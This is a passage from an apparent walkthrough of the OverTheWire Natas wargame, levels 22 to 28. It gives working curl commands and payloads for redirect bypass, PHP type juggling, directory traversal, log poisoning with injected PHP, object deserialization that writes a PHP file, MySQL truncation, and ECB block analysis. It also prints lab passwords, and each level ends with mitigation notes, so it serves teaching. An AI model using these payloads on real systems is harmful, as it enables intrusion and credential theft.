if(array_key_exists("revelio", $_GET)) {
    // only admins can reveal the password
    if(!($_SESSION and array_key_exists("admin", $_SESSION) and $_SESSION["admin"] == 1)) {
        header("Location: /");
    }
}
// snip
if(array_key_exists("revelio", $_GET)) {
    print "You are an admin. The credentials for the next level are:<br>";
    print "<pre>Username: natas23\n";
    print "Password: <censored></pre>";
}
?>

Both blocks will execute if the revelio query parameter is set. The first block will set the Location header to trigger a redirect if the user is not an admin. All that is required is to ignore the redirect, for example by using curl:

$ curl -s http://natas22.natas.labs.overthewire.org/index.php?revelio \
> -u natas22:$PW | grep "Password:"
Password: D0vlad33nQF0Hz2EP255TP5wSW9ZsRSE</pre>

Conclusion

Clients can't be trusted to follow redirect requests. While most browsers do this by default, the behavior can be prevented. An easy way to fix the issue on this level would be to call exit() in the first block, preventing further script execution.
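The difference between setting a header and stopping execution can be modelled with two small handler functions. This is a Python sketch of the control flow only; the function names and the placeholder body are assumptions, and each handler returns a (headers, body) pair.

```python
from typing import Dict, Tuple

SECRET_BODY = "Password: <censored>"  # placeholder, not a real credential


def handle_flawed(is_admin: bool, params: Dict[str, str]) -> Tuple[Dict[str, str], str]:
    """Set the redirect header but keep running, as the level's code does."""
    headers: Dict[str, str] = {}
    body = ""
    if "revelio" in params and not is_admin:
        headers["Location"] = "/"
    if "revelio" in params:
        body = SECRET_BODY
    return headers, body


def handle_fixed(is_admin: bool, params: Dict[str, str]) -> Tuple[Dict[str, str], str]:
    """Return right after the redirect, the equivalent of calling exit()."""
    if "revelio" in params and not is_admin:
        return {"Location": "/"}, ""
    body = SECRET_BODY if "revelio" in params else ""
    return {}, body
```

In the flawed version a non-admin still receives the secret in the response body alongside the Location header; a client that does not follow the redirect simply reads it.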

Level 23

#23 introduces the somewhat unexpected way in which PHP handles comparing integers and strings:

<?php
if(array_key_exists("passwd",$_REQUEST)) {
    if(strstr($_REQUEST["passwd"],"iloveyou") && ($_REQUEST["passwd"] > 10 )) {
        echo "<br>The credentials for the next level are:<br>";
        echo "<pre>Username: natas24 Password: <censored></pre>";
    } else {
        echo "<br>Wrong!<br>";
    }
}
?>

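In PHP versions prior to 8.0.0, comparing an integer with a string converts the string to a number before the comparison, using any leading digits and ignoring the rest. For example, "23natas" will become 23. The input 1337iloveyou therefore satisfies both conditions: it contains iloveyou and compares as 1337, which is greater than 10.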

$ curl -s http://natas23.natas.labs.overthewire.org?passwd=1337iloveyou \
> -u natas23:$PW | grep -E -o "Password: [[:alnum:]]{32}"
Password: OsRmXFguozKpTZZ5X14zNO43379LZveg
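The check can be approximated in Python to try out different inputs. leading_int is a rough emulation of the legacy conversion that only handles plain leading digits (no signs, whitespace or floats), so treat it as an illustration rather than a faithful model of PHP.

```python
import re


def leading_int(value: str) -> int:
    """Rough emulation of the legacy cast: leading digits, or 0 if there are none."""
    match = re.match(r"\d+", value)
    return int(match.group()) if match else 0


def check_passes(passwd: str) -> bool:
    """Mirror the level's condition under that emulation."""
    return "iloveyou" in passwd and leading_int(passwd) > 10


print(check_passes("1337iloveyou"), check_passes("iloveyou"))
```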

Conclusion

While the specific example provided is unlikely to appear in other places, the lesson is that language features may have side effects or unexpected behavior. These nuances should be understood prior to implementation.

Level 24

Level 24 follows the pattern introduced by the previous level:

<?php
if(array_key_exists("passwd",$_REQUEST)){
    if(!strcmp($_REQUEST["passwd"],"<censored>")) {
        echo "<br>The credentials for the next level are:<br>";
        echo "<pre>Username: natas25 Password: <censored></pre>";
    } else {
        echo "<br>Wrong!<br>";
    }
}
?>

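The objective is to make strcmp return a value that the ! operator turns into true. Normally that is 0, which only happens if the two strings are equal. There's a comment in the documentation highlighting that comparing a string and an array does not behave as expected: in PHP versions before 8.0 the call returns NULL (with a warning), which ! treats the same as 0. It is also possible to pass an array as an argument by appending [] to the parameter name.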

$ curl -s http://natas24.natas.labs.overthewire.org?passwd[] \
> -u natas24:$PW | grep -E -o "Password: [[:alnum:]]{32}"
Password: GHF6X7YwACaYYssHVY05cFq83hRktl4c

Conclusion

Language features and behavior must be well-understood before being used, especially in sensitive contexts. In this case, it would be a good idea to check that accessing passwd actually returns a string before verification.
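The suggested type check is shown below as a Python sketch, since the idea carries over between languages. password_ok is a hypothetical helper; hmac.compare_digest is used so that the comparison time does not depend on where the strings differ.

```python
import hmac
from typing import Any


def password_ok(candidate: Any, expected: str) -> bool:
    """Reject anything that is not a string before comparing."""
    if not isinstance(candidate, str):
        return False
    # compare_digest avoids leaking information through comparison time.
    return hmac.compare_digest(candidate.encode(), expected.encode())
```

An array-valued parameter, which would arrive as a list here, is rejected outright instead of reaching the comparison.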

Level 25

25 presents a quote and a drop-down list to switch between languages. In reviewing the provided source code one can see that the text is held in three global variables:

<?php
    session_start();
    setLanguage();

    echo "<h2>$__GREETING</h2>";
    echo "<p align=\"justify\">$__MSG";
    echo "<div align=\"right\"><h6>$__FOOTER</h6><div>";
?>

The text is loaded through an include statement, selecting a file based on the lang input parameter. The safeinclude function performs a few checks before including the file, or defaulting to en if this fails:

<?php
    function setLanguage(){
        /* language setup */
        if(array_key_exists("lang",$_REQUEST))
            if(safeinclude("language/" . $_REQUEST["lang"] ))
                return 1;
        safeinclude("language/en");
    }

    function safeinclude($filename){
        // check for directory traversal
        if(strstr($filename,"../")){
            logRequest("Directory traversal attempt! fixing request.");
            $filename=str_replace("../","",$filename);
        }
        // dont let ppl steal our passwords
        if(strstr($filename,"natas_webpass")){
            logRequest("Illegal file access detected! Aborting!");
            exit(-1);
        }
        // add more checks...

        if (file_exists($filename)) {
            include($filename);
            return 1;
        }
        return 0;
    }
/* snip */
?>

The first thing that stands out is that the directory traversal check is naive. It can easily be circumvented by using "....//" which will become "../" after the server has done its replacement. This enables loading any file, for example:

$ curl -s http://natas25.natas.labs.overthewire.org \
> -u natas25:$PW \
> -d "lang=....//....//....//....//....//etc/passwd" |
> grep "root"
root:x:0:0:root:/root:/bin/bash
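Python's str.replace behaves the same way as a single str_replace pass, which makes the bypass easy to verify offline. The is_inside function is one possible alternative check, not the level's code: it normalizes the path first and then confirms the result stays under a base directory. The base path used with it is hypothetical, and posixpath.normpath does not resolve symlinks.

```python
import posixpath


def naive_filter(filename: str) -> str:
    """Single-pass removal, as in safeinclude."""
    return filename.replace("../", "")


def is_inside(base: str, user_path: str) -> bool:
    """Normalize first, then check that the result stays under base."""
    resolved = posixpath.normpath(posixpath.join(base, user_path))
    return resolved.startswith(base.rstrip("/") + "/")


print(naive_filter("....//etc/passwd"))
print(is_inside("/srv/app/language", "../../../etc/passwd"))
```

Removing one "../" from the middle of "....//" leaves the surrounding characters to form a new "../", which is why a single pass is not enough.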

Since the second check prevents using natas_webpass in the path, it is not possible to simply point to /etc/natas_webpass/natas26 using this approach. What about the .htpasswd file for the next level? Since the length and character set are known, brute forcing this could be feasible. In testing this it became evident that the file is not accessible to the user: something else is needed...

When the path contains natas_webpass (or a traversal attempt is detected), the logRequest function is called:

function logRequest($message){
    $log="[". date("d.m.Y H::i:s",time()) ."]";
    $log=$log . " " . $_SERVER['HTTP_USER_AGENT'];
    $log=$log . " \"" . $message ."\"\n"; 
    $fd=fopen("/var/www/natas/natas25/logs/natas25_" . session_id() .".log","a");
    fwrite($fd,$log);
    fclose($fd);
}

Interesting. The log includes unsanitized input by way of the User-Agent HTTP header. The resulting file name is also predictable since the session identifier can be controlled by setting the PHPSESSID cookie. By combining these issues, it should be possible to inject PHP code that reads the password file into the log, then load that log file with a subsequent request:

$ curl -s http://natas25.natas.labs.overthewire.org \
> -u natas25:$PW \
> -d "lang=/etc/natas_webpass/natas26" \
> -A "<? include('/etc/natas_webpass/natas26'); ?>" \
> -b "PHPSESSID=omnomnom" > /dev/null
$ curl -s http://natas25.natas.labs.overthewire.org \
> -u natas25:$PW \
> -d "lang=....//....//....//....//....//var/www/natas/natas25/logs/natas25_omnomnom.log" |
> grep -E " [[:alnum:]]{32}"
[07.11.2021 12::53:51] oGgWAJ7zcGT28vYazGo4rkhOPDhBu34T

Bingpot!

Conclusion

This level demonstrated how vulnerabilities that may not be an immediate issue on their own can be combined to create a successful attack. Once again, the issues associated with inadequate sanitization for user input are highlighted.

Level 26

Level 26 provides a simple drawing tool, where lines can be drawn in a box based on two pairs of x and y coordinates that define the line start and end points.

The entry point of the code checks whether an existing drawing is available via a cookie or reads input data from input coordinates and then proceeds to render the image. In both cases, the state is saved through storeData():

<?php
    session_start();

    if (array_key_exists("drawing", $_COOKIE) ||
        (   array_key_exists("x1", $_GET) && array_key_exists("y1", $_GET) &&
            array_key_exists("x2", $_GET) && array_key_exists("y2", $_GET))){  
        $imgfile="img/natas26_" . session_id() .".png"; 
        drawImage($imgfile); 
        showImage($imgfile);
        storeData();
    }
?>

The fact that data is saved and loaded from a cookie provides a good hint on where to start: cookies can be manipulated by the user. This data is unserialized in both the storeData() and drawFromUserData() functions:

$drawing=unserialize(base64_decode($_COOKIE["drawing"]));

Since there is no sanitization of this data, it can be used to create objects with user-defined properties. This is where the Logger class, which is otherwise unused, becomes interesting:

class Logger{
    private $logFile;
    private $initMsg;
    private $exitMsg;

    function __construct($file){
        $this->initMsg="#--session started--#\n";
        $this->exitMsg="#--session end--#\n";
        $this->logFile = "/tmp/natas26_" . $file . ".log";

        $fd=fopen($this->logFile,"a+");
        fwrite($fd,$initMsg);
        fclose($fd);
    }

    function log($msg){
        $fd=fopen($this->logFile,"a+");
        fwrite($fd,$msg."\n");
        fclose($fd);
    }

    function __destruct(){
        $fd=fopen($this->logFile,"a+");
        fwrite($fd,$this->exitMsg);
        fclose($fd);
    }
}

It should be possible to create an instance of Logger based on user-supplied data. The __destruct method is one of the so-called magic methods, which are called automatically at various stages of an object's lifecycle. Unsurprisingly, __destruct is called when the object is destroyed, which happens at the latest when the script finishes. Note that unserialize() does not call __construct, so the properties keep whatever values the serialized data provides.

Combined, this presents an opportunity to modify the logFile and exitMsg properties during object creation, enabling writing arbitrary data to an arbitrary file when the object is destroyed. This can be used to inject php code by placing the code in exitMsg. Since the natas26 user has access to the ./img directory, the file with injected code can be written there and then accessed using a simple GET request.

Serialized strings can be created manually, but an easy approach is to write some php to produce the desired output. For example:

natas26.php

<?php
class Logger {
    private $logFile;
    private $initMsg;
    private $exitMsg;

    function __construct() {
        $this->initMsg = "init";
        $this->exitMsg = "<?php include('/etc/natas_webpass/natas27')?>";
        $this->logFile = "img/natas26.php";
    }
}

$log = new Logger;
echo serialize($log);
echo "\n";
echo base64_encode(serialize($log));
?>

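This generates the following serialized string and the base64 encoded version. Private property names are wrapped in NUL bytes (\0Logger\0logFile), which are invisible in the terminal; this is why each name is reported with length 15 rather than 13: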

O:6:"Logger":3:{s:15:"LoggerlogFile";s:15:"img/natas26.php";s:15:"LoggerinitMsg";s:4:"init";s:15:"LoggerexitMsg";s:45:"<?php include('/etc/natas_webpass/natas27')?>";}
Tzo2OiJMb2dnZXIiOjM6e3M6MTU6IgBMb2dnZXIAbG9nRmlsZSI7czoxNToiaW1nL25hdGFzMjYucGhwIjtzOjE1OiIATG9nZ2VyAGluaXRNc2ciO3M6NDoiaW5pdCI7czoxNToiAExvZ2dlcgBleGl0TXNnIjtzOjQ1OiI8P3BocCBpbmNsdWRlKCcvZXRjL25hdGFzX3dlYnBhc3MvbmF0YXMyNycpPz4iO30=
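
For anyone without a PHP interpreter at hand, the same payload can be assembled by hand. The sketch below is a hedged Python approximation of PHP's serialization format for this one case (an object with private string properties only); php_string and serialize_private_object are hypothetical helper names, not part of any library:

```python
import base64


def php_string(value: bytes) -> bytes:
    """Serialize a byte string in PHP's format: s:<length>:"<bytes>";"""
    return b's:%d:"%s";' % (len(value), value)


def serialize_private_object(class_name: bytes, properties: list) -> bytes:
    """Serialize an object whose properties are all private strings."""
    body = b""
    for name, value in properties:
        # Private property names are stored as \0<class>\0<name>.
        body += php_string(b"\x00" + class_name + b"\x00" + name)
        body += php_string(value)
    return b'O:%d:"%s":%d:{%s}' % (len(class_name), class_name, len(properties), body)


payload = serialize_private_object(
    b"Logger",
    [
        (b"logFile", b"img/natas26.php"),
        (b"initMsg", b"init"),
        (b"exitMsg", b"<?php include('/etc/natas_webpass/natas27')?>"),
    ],
)
cookie = base64.b64encode(payload).decode()

print(payload)  # the NUL bytes show up as \x00 here
print(cookie)   # value for the drawing cookie
```

Printing the raw bytes makes the NUL bytes visible, which is also why the base64 form is the safer one to copy around.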

This output is simply placed in a cookie named drawing to create the new file, followed by requesting that file to execute the code:

$ # create the file
$ curl -s http://natas26.natas.labs.overthewire.org \
> -u natas26:$PW \
> -b "drawing=Tzo2OiJMb2dnZXIiOjM6e3M6MTU6IgBMb2dnZXIAbG9nRmlsZSI7czoxNToiaW1nL25hdGFzMjYucGhwIjtzOjE1OiIATG9nZ2VyAGluaXRNc2ciO3M6NDoiaW5pdCI7czoxNToiAExvZ2dlcgBleGl0TXNnIjtzOjQ1OiI8P3BocCBpbmNsdWRlKCcvZXRjL25hdGFzX3dlYnBhc3MvbmF0YXMyNycpPz4iO30=" > /dev/null
$ # get the file
$ curl -s http://natas26.natas.labs.overthewire.org/img/natas26.php \
> -u natas26:$PW
55TBjpPZUUJgVP5b3BnbG6ON9uDPVzCJ

And there we have it.

Conclusion

There are quite a few things that can be done to mitigate this type of vulnerability. Besides the obvious recommendation to not pass user input to unserialize, one could also avoid implementing magic methods and use the options parameter (allowed_classes) to restrict which classes are allowed to be created this way.

More robust approaches include using a standard data format such as JSON and only instantiating an object of the expected type. Finally, the issue can be avoided altogether by storing and managing this state server-side instead.

Level 27

27 presents a login prompt that accepts a username and password. The login logic first checks if the user exists, then verifies the password. Curiously, if the user does not exist, it is created. Causing the dumpData function to be called with the natas28 username should print the credentials, so that is the objective.

2023 Update

This level had been slightly updated when I revisited my solutions, and my original approach (kept further below for reference) no longer worked. The main difference is the two substr() calls in createUser():

<?
function createUser($link, $usr, $pass){

    if($usr != trim($usr)) {
        echo "Go away hacker";
        return False;
    }
    $user=mysqli_real_escape_string($link, substr($usr, 0, 64));
    $password=mysqli_real_escape_string($link, substr($pass, 0, 64));

    $query = "INSERT INTO users (username,password) values ('$user','$password')";
    $res = mysqli_query($link, $query);
    if(mysqli_affected_rows($link) > 0){
        return True;
    }
    return False;
}
?>

The user record is created from a substring of maximum length 64, so the overflow used in the previous approach no longer happens. The objective then is to provide an input that passes the trim() check at the top of createUser(), but is still treated as "natas28" once it has been cut to 64 characters, leaving only trailing whitespace after the name. This can be achieved as follows:

$ NATAS28=$(python3 -c 'print("natas28" + 57 * " " + ".")')
$ curl -s -X POST http://natas27.natas.labs.overthewire.org -u natas27:$PW \
> -d "username=${NATAS28}" -d "password=" > /dev/null
$ curl -X POST -s http://natas27.natas.labs.overthewire.org -u natas27:$PW \
> -d "username=${NATAS28:0:64}" -d "password=" |
> tac | grep -oEm1 "[[:alnum:]]{32}"
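
Why the 65-character payload works can be checked offline. The Python sketch below models the three steps involved; the helper names are hypothetical, and same_user encodes the assumption that the database ignores trailing spaces when comparing strings:

```python
MAX_LEN = 64  # column width and substr() limit


def passes_trim_check(username: str) -> bool:
    """Model of `$usr != trim($usr)`: reject leading/trailing whitespace."""
    return username == username.strip(" \t\n\r\0\x0b")


def truncate(username: str) -> str:
    """Model of substr($usr, 0, 64)."""
    return username[:MAX_LEN]


def same_user(stored: str, supplied: str) -> bool:
    """Assumption: the comparison ignores trailing spaces."""
    return stored.rstrip(" ") == supplied.rstrip(" ")


payload = "natas28" + 57 * " " + "."
stored = truncate(payload)

print(len(payload), passes_trim_check(payload))  # the trailing "." defeats trim()
print(repr(stored))                              # the "." is cut off at 64 characters
print(same_user(stored, "natas28"))              # what is left compares equal to natas28
```

The trailing "." only has to survive the trim() check; it is gone by the time the value reaches the INSERT statement.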

A quick fix for this issue would be to move the two substr() lines to the start of the main if/else block, then use the escaped and truncated values throughout.

Original

<?
// ...
if(array_key_exists("username", $_REQUEST) and array_key_exists("password", $_REQUEST)) {
    $link = mysql_connect('localhost', 'natas27', '<censored>');
    mysql_select_db('natas27', $link);

    if(validUser($link,$_REQUEST["username"])) {
        //user exists, check creds
        if(checkCredentials($link,$_REQUEST["username"],$_REQUEST["password"])){
            echo "Welcome " . htmlentities($_REQUEST["username"]) . "!<br>";
            echo "Here is your data:<br>";
            $data=dumpData($link,$_REQUEST["username"]);
            print htmlentities($data);
        }
        else{
            echo "Wrong password for user: " . htmlentities($_REQUEST["username"]) . "<br>";
        }
    }
    else {
        if(createUser($link,$_REQUEST["username"],$_REQUEST["password"])){ 
            echo "User " . htmlentities($_REQUEST["username"]) . " was created!";
        }
    }
    mysql_close($link);
} // ...
?>

The application stores data in a simple table with both username and password defined as varchar(64):

CREATE TABLE `users` (
`username` varchar(64) DEFAULT NULL,
`password` varchar(64) DEFAULT NULL
);

Reviewing the rest of the code, there is no place where input is restricted to 64 characters. Depending on how the MySQL database is configured, strict mode might not be enforced. Testing for strict mode can be done by sending a sample request with a username that exceeds 64 characters:

$ export NATAS28=$(python3 -c 'print("natas28" + 64 * " " + "a")')
$ curl -s -X POST http://natas27.natas.labs.overthewire.org \
> -u natas27:$PW \
> -d "username=${NATAS28}" -d "password=123" |
> grep natas28
User natas28                                                                a was created!<div id="viewsource"><a href="index-source.html">View sourcecode</a></div>

The fact that the user was created successfully indicates that strict mode is not enforced; if it were, MySQL would have triggered an error for the query. At this point, attempting to log on with natas28 and the new password will return the password for the original natas28 user:

$ curl -X POST -s http://natas27.natas.labs.overthewire.org \
> -u natas27:$PW \
> -d "username=natas28" -d "password=123" | sed -n "/(/,/)/p"
(
    [username] =&gt; natas28
    [password] =&gt; JWwR438wkgTsNKBbcJoowyysdM82YjeF
)

So, how does this work? If strict mode is not enforced, the database truncates the data to the maximum column length on insert, and any trailing whitespace that remains is ignored in comparisons. That means the first request slips past the basic existence check performed in validUser() and creates a second record with a username that is effectively natas28. Next, checkCredentials() verifies the password against the new record, since its query requires both username and password to match (the and operator). When dumpData() is called, the first record matching that username is returned from the database.

This can be replicated with a new user foo for demonstration purposes:

$ export foo=$(python3 -c 'print("foo" + 64 * " " + "a")')
$ curl -X POST -s http://natas27.natas.labs.overthewire.org \
> -u natas27:$PW \
> -d "username=foo" -d "password=bar" > /dev/null # create 1st user
$ curl -X POST -s http://natas27.natas.labs.overthewire.org \
> -u natas27:$PW \
> -d "username=${foo}" -d "password=baz" > /dev/null # create 2nd user
$ curl -X POST -s http://natas27.natas.labs.overthewire.org \
> -u natas27:$PW \
> -d "username=foo" -d "password=baz" | sed -n "/(/,/)/p" # login with 2nd user
(
    [username] =&gt; foo
    [password] =&gt; bar
)
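
The foo experiment can also be modelled without a database. The following Python sketch is a toy in-memory version of the login flow; the function names loosely mirror the PHP ones, and both the truncation on insert and the trailing-space-insensitive comparison are assumptions about how the database behaves here:

```python
MAX_LEN = 64
users = []  # rows as (username, password), in insertion order


def same_name(stored, supplied):
    # Assumption: string comparison ignores trailing spaces.
    return stored.rstrip(" ") == supplied.rstrip(" ")


def valid_user(name):
    return any(same_name(u, name) for u, _ in users)


def check_credentials(name, password):
    return any(same_name(u, name) and p == password for u, p in users)


def create_user(name, password):
    # Assumption: without strict mode, an over-long value is cut to the column width.
    users.append((name[:MAX_LEN], password))


def dump_data(name):
    # The first matching row wins.
    for u, p in users:
        if same_name(u, name):
            return {"username": u.rstrip(" "), "password": p}
    return None


def handle(name, password):
    """Mirror of the main if/else block."""
    if valid_user(name):
        if check_credentials(name, password):
            return dump_data(name)
        return "wrong password"
    create_user(name, password)
    return "created"


print(handle("foo", "bar"))                   # create 1st user
print(handle("foo" + 64 * " " + "a", "baz"))  # create 2nd user
print(handle("foo", "baz"))                   # login with 2nd user, dump 1st
```

The flaw is visible in handle(): the credential check and the data dump each run their own lookup, and nothing guarantees that they land on the same row.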

Conclusion

STRICT_ALL_TABLES is probably a good idea
Requests should be validated server-side
Paranoia can be a good thing. Especially when it comes to user input. Remember: everyone is out to get you!

Level 28

The application in level 28 lets the user search for computer-related jokes. No source code is provided so some experimentation will be needed to figure out how it works. When submitting a search the application responds with HTTP 302 and a Location HTTP header to redirect the user to a new page search.php with a query parameter:

$ curl -s -X POST -D - http://natas28.natas.labs.overthewire.org \
> -u natas28:$PW \
> --data-raw "query=void" | grep Location
Location: search.php/?query=G%2BglEae6W%2F1XjA7vRm21nNyEco%2Fc%2BJ2TdR0Qp8dcjPLJ
2QAB7XXD%2FTT%2F3%2BuiqX%2BJKSh%2FPMVHnhLmbzHIY7GAR1bVcy3Ix3D2Q5cVi8F6bmY%3D

Some experimentation indicates that the application:

returns at most 3 records
appears to use a LIKE '%<input>%' statement for the query matching
randomizes responses for more than 3 matches
- this might be implemented in the application and not the database query
the size of query parameter is related to the size of user input

The trailing %3D (=) hints that the data may be base64 encoded, but decoding it does not produce any immediately useful results:

>>> import base64
>>> from urllib.parse import unquote
>>> import textwrap
>>> query = (
    "G%2BglEae6W%2F1XjA7vRm21nNyEco%2Fc%2BJ2TdR0Qp8dcjPLJ2QAB7XXD%2FTT%2F3%2Bu"
    "iqX%2BJKSh%2FPMVHnhLmbzHIY7GAR1bVcy3Ix3D2Q5cVi8F6bmY%3D"
)
>>> decoded_query = base64.b64decode(unquote(query)).hex()
>>> print(textwrap.fill(decoded_query, 32))
1be82511a7ba5bfd578c0eef466db59c
dc84728fdcf89d93751d10a7c75c8cf2
c9d90001ed75c3fd34ffdfeba2a97f89
29287f3cc5479e12e66f31c863b18047
56d5732dc8c770f64397158bc17a6e66

Some automation might help discern a pattern based on the user input query. The (admittedly not particularly elegant) program below submits repeated requests, increasing the size of the input each time. The size of the output is tracked, and any changes (~) and additions (+) compared to the previous request are marked.

natas28_probe.py

import base64
import requests
import textwrap
from collections import namedtuple
from urllib.parse import unquote


def main():
    url = "http://natas28.natas.labs.overthewire.org"
    session = requests.Session()
    session.auth = ("natas28", "JW..")

    Query = namedtuple("Query", ["user_query", "query"])
    history: list[Query] = []

    for n in range(0, 50):
        user_query = "a" * n
        with session.post(url, params={"query": user_query}) as response:
            _, query = response.url.split("=")
            query = base64.b64decode(unquote(query)).hex()
            history.append(Query(user_query=user_query, query=query))

    for n, q in enumerate(history):
        print(f"input: {q.user_query} ({len(q.user_query)})")
        print(f"query length: {len(q.query)}")
        if n == 0:
            print(textwrap.fill(q.query, 32))
        else:
            query = textwrap.wrap(q.query, 32)
            prev_query = textwrap.wrap(history[n - 1].query, 32)
            for m, q in enumerate(query):
                print(f"{m}: ", end="")
                if m < len(prev_query):
                    if q == prev_query[m]:
                        print(f" {q}")
                    else:
                        print(f"~{q}")  # changed block
                else:
                    print(f"+{q}")  # new block
        print()


if __name__ == "__main__":
    main()

Running natas28_probe.py produces the following output (heavily truncated):

$ python3 natas28_probe.py
input:  (0)
query length: 160
1be82511a7ba5bfd578c0eef466db59c
dc84728fdcf89d93751d10a7c75c8cf2
e87ff60c99ad72ccbd947e3417a90128
a77e8ed1aabe0b5d05c4ffe6ac1423ab
478eb1a1fe261a2c6c15061109b3feda
...
input: aaaaaaaaaa (10)
query length: 160
0:  1be82511a7ba5bfd578c0eef466db59c
1:  dc84728fdcf89d93751d10a7c75c8cf2
2: ~c0872dee8bc90b1156913b08a223a39e
3: ~738a5ffb4a4500246775175ae596bbd6
4: ~f34df339c69edce11f6650bbced62702
...
input: aaaaaaaaaaaaa (13)
query length: 192
0:  1be82511a7ba5bfd578c0eef466db59c
1:  dc84728fdcf89d93751d10a7c75c8cf2
2:  c0872dee8bc90b1156913b08a223a39e
3: ~1f74714d76fcc5d464c6a221e6ed98e4
4: ~6223a14d9c4291b98775b03fbc73d4ed
5: +d8ae51d7da71b2b083d919a0d7b88b98

input: aaaaaaaaaaaaaa (14)
query length: 192
0:  1be82511a7ba5bfd578c0eef466db59c
1:  dc84728fdcf89d93751d10a7c75c8cf2
2:  c0872dee8bc90b1156913b08a223a39e
3: ~ecd36f8fd9164d403540e449707d27e5
4: ~4257a343daadaaf2c0e3a1d71ce03dd1
5: ~7b7baca655f298a321e90e3f7a60d4d8
...
input: aaaaaaaaaaaaaaaaaaaaaaaaaaaaa (29)
query length: 224
0:  1be82511a7ba5bfd578c0eef466db59c
1:  dc84728fdcf89d93751d10a7c75c8cf2
2:  c0872dee8bc90b1156913b08a223a39e
3:  b39038c28df79b65d26151df58f7eaa3
4: ~1f74714d76fcc5d464c6a221e6ed98e4
5: ~6223a14d9c4291b98775b03fbc73d4ed
6: +d8ae51d7da71b2b083d919a0d7b88b98
...
input: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa (42)
query length: 224
0:  1be82511a7ba5bfd578c0eef466db59c
1:  dc84728fdcf89d93751d10a7c75c8cf2
2:  c0872dee8bc90b1156913b08a223a39e
3:  b39038c28df79b65d26151df58f7eaa3
4: ~b39038c28df79b65d26151df58f7eaa3
5: ~738a5ffb4a4500246775175ae596bbd6
6: ~f34df339c69edce11f6650bbced62702
...

Several observations can be made from this output:

the output is deterministic in the sense that the same input always produces the same output
the length of every resulting query (represented as hex) is a multiple of 32
every 16 characters of input, the resulting query size increases by 32
- for example 29 - 13 = 16 (and 224 - 192 = 32)
some chunks are static:
- 0, 1 for all requests
- 0, 1, 2 when input size is >=10
- at 42 characters of input chunks 3 and 4 are repeating

All of the above indicates that the query string is produced by a block cipher operating in ECB mode, with block size 16. Identical plaintext blocks are encrypted independently with the same key, so they produce identical ciphertext blocks. This is visible when two blocks (3, 4) are full of a's at 42 characters of input and both produce b39038c28df79b65d26151df58f7eaa3. That a padded block cipher is in use can be confirmed by sending a query string with incorrect padding, which generates a revealing error message:

$ curl -s http://natas28.natas.labs.overthewire.org/search.php?query=asdf \
> -u natas28:$PW | grep block
Incorrect amount of PKCS#7 padding for blocksize
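
Spotting repeated blocks by eye gets tedious quickly. A small Python helper can do the same check; repeated_blocks is a hypothetical name, and the sample is the 42-character response from the probe output above:

```python
from collections import Counter

BLOCK_SIZE = 16


def repeated_blocks(ciphertext: bytes, block_size: int = BLOCK_SIZE) -> dict:
    """Return the hex of every block that occurs more than once, with its count."""
    blocks = [
        ciphertext[i:i + block_size]
        for i in range(0, len(ciphertext), block_size)
    ]
    return {b.hex(): n for b, n in Counter(blocks).items() if n > 1}


# Ciphertext returned for 42 a's of input, as listed in the probe output.
sample = bytes.fromhex(
    "1be82511a7ba5bfd578c0eef466db59c"
    "dc84728fdcf89d93751d10a7c75c8cf2"
    "c0872dee8bc90b1156913b08a223a39e"
    "b39038c28df79b65d26151df58f7eaa3"
    "b39038c28df79b65d26151df58f7eaa3"
    "738a5ffb4a4500246775175ae596bbd6"
    "f34df339c69edce11f6650bbced62702"
)
print(repeated_blocks(sample))
```

Any non-empty result for attacker-chosen repetitive input is a strong hint of ECB; a mode with chaining or a nonce would not be expected to repeat blocks like this.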

So how can this be used to leak the password for natas29? One theory is that while the application properly escapes input for the SQL query, it might be possible to perform an SQL injection by manipulating the input to produce an encrypted query output which contains an SQL statement of choice. Since each block is processed separately, it should be possible to stitch blocks together or only send some of the blocks.

From the output of natas28_probe.py it is clear that the offset for a clean block is 12: a new block gets created when input reaches 13. At 10 a's, the input to the cipher function looks like this, where ? are unknown characters:

      +---------------------------------------------------------------+
      |                             byte                              |
+-----+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+
|block| 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10| 11| 12| 13| 14| 15|
+-----+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+
|   0 | ? | ? | ? | ? | ? | ? | ? | ? | ? | ? | ? | ? | ? | ? | ? | ? |
+-----+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+
|   1 | ? | ? | ? | ? | ? | ? | ? | ? | ? | ? | ? | ? | ? | ? | ? | ? |
+-----+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+
|   2 | ? | ? | ? | ? | ? | ? | a | a | a | a | a | a | a | a | a | a |
+-----+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+
|   3 | ? | ? | ? | ? | ? | ? | ? | ? | ? | ? | ? | ? | ? | ? | ? | ? |
+-----+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+
|   4 | ? | ? | ? | ? | ? | ? | ? | ? | ? | ? | ? | ? | ? | ? | ? | ? |
+-----+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+

It is possible to determine that there is indeed a % directly following the input, by observing that both aaaaaaaaa and aaaaaaaaa% produce 9e622686a52640595706099abcb052bb for block 2. In a similar way, it is possible to determine that an input ' is escaped, as aaaaaaaa and aaaaaaaa%' produce different results.

Continuing to use 10 a's of input (of course, any 10 single-byte characters can be used), it is possible to reproduce the first two blocks of the query with some guesswork. This confirms both that this is indeed SQL and the structure of the query. Note that blocks 0,1 and 3,4 are identical:

>>> import base64, requests, textwrap
>>> from urllib.parse import unquote
>>> url = "http://natas28.natas.labs.overthewire.org"
>>> auth = ("natas28", "JW..")
>>> input = "aaaaaaaaaaSELECT * from jokes where joke l"
>>> r = requests.post(url, params={"query": input}, auth=auth)
>>> _, query = r.url.split("=")
>>> query = base64.b64decode(unquote(query)).hex()
>>> for n, chunk in enumerate(textwrap.wrap(query, 32)):
...     print(f"{n}: {chunk}")
... 
0: 1be82511a7ba5bfd578c0eef466db59c
1: dc84728fdcf89d93751d10a7c75c8cf2
2: c0872dee8bc90b1156913b08a223a39e
3: 1be82511a7ba5bfd578c0eef466db59c
4: dc84728fdcf89d93751d10a7c75c8cf2
5: 738a5ffb4a4500246775175ae596bbd6
6: f34df339c69edce11f6650bbced62702

When reaching an input of size 13, a new block is created, where P represents padding added to the new block (each block needs to be exactly the cipher's block size, in this case 16 bytes). The SELECT statement looks something like this:

      +---------------------------------------------------------------+
      |                             byte                              |
+-----+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+
